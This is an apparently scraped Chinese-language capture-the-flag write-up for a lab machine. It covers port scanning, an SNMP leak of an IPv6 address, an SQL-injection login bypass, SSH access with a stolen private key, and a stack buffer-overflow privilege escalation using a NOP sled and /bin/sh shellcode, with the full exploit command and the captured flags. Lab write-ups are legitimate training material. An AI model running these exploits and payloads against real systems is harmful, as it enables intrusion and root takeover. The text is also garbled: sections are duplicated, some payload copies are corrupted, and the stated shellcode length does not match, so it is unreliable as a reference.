SNMP+SSH-IPV6+BOF-NOP-Sled 权限提升技术详解<\/h1>

1. 信息收集阶段<\/h2>

1.1 目标识别<\/h3>

目标IP地址: 10.10.10.20<\/code><\/p>

开放端口扫描结果:<\/p>


TCP 22: OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8<\/li>
TCP 80: Apache httpd 2.4.7 (Ubuntu)<\/li>
<\/ul>
扫描命令:<\/p>
ip=<\/span>'10.10.10.20'<\/span>; itf=<\/span>'tun0'<\/span>; 
<\/span><\/span>if<\/span> nmap -Pn -sn "<\/span>$ip"<\/span> | grep -q "Host is up"<\/span>; then<\/span> 
<\/span><\/span>  echo -e "\e[32m[+] Target <\/span>$ip is up, scanning ports...\e[0m"<\/span>; 
<\/span><\/span>  ports=<\/span>$(<\/span>sudo masscan -p1-65535,U:1-65535 "<\/span>$ip"<\/span> --rate=<\/span>1000<\/span> -e "<\/span>$itf"<\/span> | awk '\/open\/ {print $4}'<\/span> | cut -d '\/'<\/span> -f1 | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>; 
<\/span><\/span>  if<\/span> [<\/span> -n "<\/span>$ports"<\/span> ]<\/span>; then<\/span> 
<\/span><\/span>    echo -e "\e[34m[+] Open ports found on <\/span>$ip: <\/span>$ports\e[0m"<\/span>; 
<\/span><\/span>    nmap -Pn -sV -sC -p "<\/span>$ports"<\/span> "<\/span>$ip"<\/span>; 
<\/span><\/span>  else<\/span> 
<\/span><\/span>    echo -e "\e[31m[!] No open ports found on <\/span>$ip.\e[0m"<\/span>; 
<\/span><\/span>  fi<\/span>; 
<\/span><\/span>else<\/span> 
<\/span><\/span>  echo -e "\e[31m[!] Target <\/span>$ip is unreachable, network is down.\e[0m"<\/span>; 
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre>1.2 SNMP信息泄露<\/h3>
通过SNMP协议获取IPv6地址:<\/p>
snmpwalk -v2c -c public 10.10.10.20 ipAddressIfIndex.ipv6 | cut -d'"'<\/span> -f2 | grep 'de:ad'<\/span> | sed -E 's\/(.{2}):(.{2})\/\1\2\/g'<\/span>
<\/span><\/span><\/code><\/pre>获取到的IPv6地址: dead:beef:0000:0000:0250:56ff:feb9:0752<\/code><\/p>
2. IPv6基础知识<\/h2>
2.1 IPv6地址表示法<\/h3>
示例: 2001:0db8:85a3:0000:0000:8a2e:0370:7334<\/code><\/p>
双冒号(::)缩写: 2001:0db8:85a3::8a2e:0370:7334<\/code><\/p>
2.2 IPv6地址类型<\/h3>



地址类型<\/th>
前缀<\/th>
描述<\/th>
<\/tr>
<\/thead>


全局单播地址<\/td>
2000::\/3<\/td>
互联网中的唯一可路由地址<\/td>
<\/tr>

链路本地地址<\/td>
FE80::\/10<\/td>
仅限于本地链路通信<\/td>
<\/tr>

唯一本地地址(ULA)<\/td>
FC00::\/7<\/td>
类似IPv4的私有地址<\/td>
<\/tr>

回环地址<\/td>
::1\/128<\/td>
相当于IPv4的127.0.0.1<\/td>
<\/tr>

未指定地址<\/td>
::\/128<\/td>
相当于IPv4的0.0.0.0<\/td>
<\/tr>

多播地址<\/td>
FF00::\/8<\/td>
用于多播通信<\/td>
<\/tr>

IPv4映射地址<\/td>
::FFFF:0:0\/96<\/td>
兼容IPv4的IPv6地址<\/td>
<\/tr>
<\/tbody>
<\/table>
2.3 IPv6扫描注意事项<\/h3>

IPv6最小子网通常是\/64，意味着有2^64个可能地址<\/li>
暴力扫描几乎不可行，必须依赖信息泄露或其他方法获取具体地址<\/li>
<\/ul>
3. Web应用漏洞利用<\/h2>
3.1 目录扫描<\/h3>
使用feroxbuster进行目录扫描:<\/p>
feroxbuster --url 'http:\/\/10.10.10.20'<\/span>
<\/span><\/span><\/code><\/pre>发现敏感目录: http:\/\/10.10.10.20\/dev\/<\/code><\/p>
3.2 SQL注入漏洞<\/h3>
在发现的目录中可能存在SQL注入点:<\/p>
admin<\/span>' or 1=1;#
<\/span><\/span><\/span><\/code><\/pre>4. SSH通过IPv6绕过限制<\/h2>
4.1 获取SSH私钥<\/h3>
通过漏洞获取的RSA私钥:<\/p>
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAvQxBD5yRBGemrZI9F0O13j15wy9Ou8Z5Um2bC0lMdV9ckyU5
[...省略部分内容...]
-----END RSA PRIVATE KEY-----
<\/code><\/pre>
4.2 通过IPv6连接SSH<\/h3>
管理员可能禁用了IPv4的SSH访问，但忽略了IPv6限制:<\/p>
ssh -oPubkeyAcceptedKeyTypes=<\/span>+ssh-rsa -oHostKeyAlgorithms=<\/span>+ssh-rsa -i \/tmp\/id_rsa thrasivoulos@dead:beef:0000:0000:0250:56ff:feb9:0752
<\/span><\/span><\/code><\/pre>5. 权限提升:缓冲区溢出+NOP滑梯<\/h2>
5.1 目标程序分析<\/h3>
目标程序路径: \/usr\/local\/bin\/chal<\/code><\/p>
关键漏洞:<\/p>
char<\/span> var_16e[366<\/span>];  \/\/ 缓冲区大小366字节，但最多存储365个字符
<\/span><\/span><\/span><\/code><\/pre>5.2 安全检查状态<\/h3>
使用checksec检查程序保护机制:<\/p>
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : Partial
<\/code><\/pre>
5.3 缓冲区溢出利用步骤<\/h3>


确定溢出偏移量<\/strong>:<\/p>
gdb-peda$ pattern create 1024<\/span>
<\/span><\/span>gdb-peda$ pattern offset 0x25415525
<\/span><\/span><\/code><\/pre>确定偏移量为362字节<\/p>
<\/li>

确认NOP滑梯范围<\/strong>:<\/p>
gdb -q \/usr\/local\/bin\/chal
<\/span><\/span>(<\/span>gdb)<\/span> r $(<\/span>python2 -c 'print "A"*362'<\/span>)<\/span>
<\/span><\/span>(<\/span>gdb)<\/span> x\/100x $esp
<\/span><\/span><\/code><\/pre>确认可执行区域: 0xbffff740-0xbffff8af<\/code><\/p>
<\/li>

选择稳定的返回地址<\/strong>: 0xbffff750<\/code><\/p>
<\/li>
<\/ol>
5.4 构造利用载荷<\/h3>
Shellcode (23字节):<\/p>
"<\/span>\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80<\/span>"<\/span>
<\/span><\/span><\/code><\/pre>NOP滑梯长度: 362 - 23 = 339<\/code><\/p>
完整利用命令:<\/p>
\/usr\/local\/bin\/chal $(<\/span>python2 -c 'print "\x90"*339 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x50\xf7\xff\xbf"'<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>6. 标志获取<\/h2>

用户标志: f18b5084af22f6908e2e778569e4682a<\/code><\/li>
Root标志: 2d21ee153f5d1e517dcfc197a58a2e37<\/code><\/li>
<\/ul>
7. 技术要点总结<\/h2>


SNMP信息泄露<\/strong>是获取内部网络信息的重要途径<\/p>
<\/li>

IPv6配置疏忽<\/strong>常被管理员忽略，是绕过访问控制的有效方法<\/p>
<\/li>

旧版SSH配置<\/strong>需要特殊参数连接(PubkeyAcceptedKeyTypes<\/code>和HostKeyAlgorithms<\/code>)<\/p>
<\/li>

缓冲区溢出利用<\/strong>的关键步骤:<\/p>

确定偏移量<\/li>
检查内存保护机制<\/li>
定位可执行内存区域<\/li>
构造NOP滑梯和shellcode<\/li>
精确控制返回地址<\/li>
<\/ul>
<\/li>

开发安全<\/strong>建议:<\/p>

启用所有内存保护机制(CANARY, NX, PIE等)<\/li>
对用户输入进行严格验证<\/li>
定期检查服务配置，避免信息泄露<\/li>
<\/ul>
<\/li>
<\/ol>

地址类型<\/th>	前缀<\/th>	描述<\/th> <\/tr> <\/thead>
全局单播地址<\/td>	2000::\/3<\/td>	互联网中的唯一可路由地址<\/td> <\/tr>
链路本地地址<\/td>	FE80::\/10<\/td>	仅限于本地链路通信<\/td> <\/tr>
唯一本地地址(ULA)<\/td>	FC00::\/7<\/td>	类似IPv4的私有地址<\/td> <\/tr>
回环地址<\/td>	::1\/128<\/td>	相当于IPv4的127.0.0.1<\/td> <\/tr>
未指定地址<\/td>	::\/128<\/td>	相当于IPv4的0.0.0.0<\/td> <\/tr>
多播地址<\/td>	FF00::\/8<\/td>	用于多播通信<\/td> <\/tr>
IPv4映射地址<\/td>	::FFFF:0:0\/96<\/td>	兼容IPv4的IPv6地址<\/td> <\/tr> <\/tbody> <\/table> 2.3 IPv6扫描注意事项<\/h3> IPv6最小子网通常是\/64，意味着有2^64个可能地址<\/li> 暴力扫描几乎不可行，必须依赖信息泄露或其他方法获取具体地址<\/li> <\/ul> 3. Web应用漏洞利用<\/h2> 3.1 目录扫描<\/h3> 使用feroxbuster进行目录扫描:<\/p> feroxbuster --url 'http:\/\/10.10.10.20'<\/span> <\/span><\/span><\/code><\/pre>发现敏感目录: http:\/\/10.10.10.20\/dev\/<\/code><\/p> 3.2 SQL注入漏洞<\/h3> 在发现的目录中可能存在SQL注入点:<\/p> admin<\/span>' or 1=1;# <\/span><\/span><\/span><\/code><\/pre>4. SSH通过IPv6绕过限制<\/h2> 4.1 获取SSH私钥<\/h3> 通过漏洞获取的RSA私钥:<\/p> -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAvQxBD5yRBGemrZI9F0O13j15wy9Ou8Z5Um2bC0lMdV9ckyU5 [...省略部分内容...] -----END RSA PRIVATE KEY----- <\/code><\/pre> 4.2 通过IPv6连接SSH<\/h3> 管理员可能禁用了IPv4的SSH访问，但忽略了IPv6限制:<\/p> ssh -oPubkeyAcceptedKeyTypes=<\/span>+ssh-rsa -oHostKeyAlgorithms=<\/span>+ssh-rsa -i \/tmp\/id_rsa thrasivoulos@dead:beef:0000:0000:0250:56ff:feb9:0752 <\/span><\/span><\/code><\/pre>5. 权限提升:缓冲区溢出+NOP滑梯<\/h2> 5.1 目标程序分析<\/h3> 目标程序路径: \/usr\/local\/bin\/chal<\/code><\/p> 关键漏洞:<\/p> char<\/span> var_16e[366<\/span>]; \/\/ 缓冲区大小366字节，但最多存储365个字符 <\/span><\/span><\/span><\/code><\/pre>5.2 安全检查状态<\/h3> 使用checksec检查程序保护机制:<\/p> CANARY : disabled FORTIFY : disabled NX : disabled PIE : disabled RELRO : Partial <\/code><\/pre> 5.3 缓冲区溢出利用步骤<\/h3> 确定溢出偏移量<\/strong>:<\/p> gdb-peda$ pattern create 1024<\/span> <\/span><\/span>gdb-peda$ pattern offset 0x25415525 <\/span><\/span><\/code><\/pre>确定偏移量为362字节<\/p> <\/li> 确认NOP滑梯范围<\/strong>:<\/p> gdb -q \/usr\/local\/bin\/chal <\/span><\/span>(<\/span>gdb)<\/span> r $(<\/span>python2 -c 'print "A"362'<\/span>)<\/span> <\/span><\/span>(<\/span>gdb)<\/span> x\/100x $esp <\/span><\/span><\/code><\/pre>确认可执行区域: 0xbffff740-0xbffff8af<\/code><\/p> <\/li> 选择稳定的返回地址<\/strong>: 0xbffff750<\/code><\/p> <\/li> <\/ol> 5.4 构造利用载荷<\/h3> Shellcode (23字节):<\/p> "<\/span>\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80<\/span>"<\/span> <\/span><\/span><\/code><\/pre>NOP滑梯长度: 362 - 23 = 339<\/code><\/p> 完整利用命令:<\/p> \/usr\/local\/bin\/chal $(<\/span>python2 -c 'print "\x90"339 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x50\xf7\xff\xbf"'<\/span>)<\/span> <\/span><\/span><\/code><\/pre>6. 标志获取<\/h2> 用户标志: f18b5084af22f6908e2e778569e4682a<\/code><\/li> Root标志: 2d21ee153f5d1e517dcfc197a58a2e37<\/code><\/li> <\/ul> 7. 技术要点总结<\/h2> SNMP信息泄露<\/strong>是获取内部网络信息的重要途径<\/p> <\/li> IPv6配置疏忽<\/strong>常被管理员忽略，是绕过访问控制的有效方法<\/p> <\/li> 旧版SSH配置<\/strong>需要特殊参数连接(PubkeyAcceptedKeyTypes<\/code>和HostKeyAlgorithms<\/code>)<\/p> <\/li> 缓冲区溢出利用<\/strong>的关键步骤:<\/p> 确定偏移量<\/li> 检查内存保护机制<\/li> 定位可执行内存区域<\/li> 构造NOP滑梯和shellcode<\/li> 精确控制返回地址<\/li> <\/ul> <\/li> 开发安全<\/strong>建议:<\/p> 启用所有内存保护机制(CANARY, NX, PIE等)<\/li> 对用户输入进行严格验证<\/li> 定期检查服务配置，避免信息泄露<\/li> <\/ul> <\/li> <\/ol>

SNMP+SSH-IPV6+BOF-NOP-Sled 权限提升技术详解<\/h1>

1. 信息收集阶段<\/h2>

2.1 IPv6地址表示法<\/h3> 示例: 2001:0db8:85a3:0000:0000:8a2e:0370:7334<\/code><\/p> 双冒号(::)缩写: 2001:0db8:85a3::8a2e:0370:7334<\/code><\/p>

3. Web应用漏洞利用<\/h2>

4. SSH通过IPv6绕过限制<\/h2>

5. 权限提升:缓冲区溢出+NOP滑梯<\/h2>

2.1 IPv6地址表示法<\/h3>
示例: `2001:0db8:85a3:0000:0000:8a2e:0370:7334<\/code><\/p>`
`双冒号(::)缩写: 2001:0db8:85a3::8a2e:0370:7334<\/code><\/p>`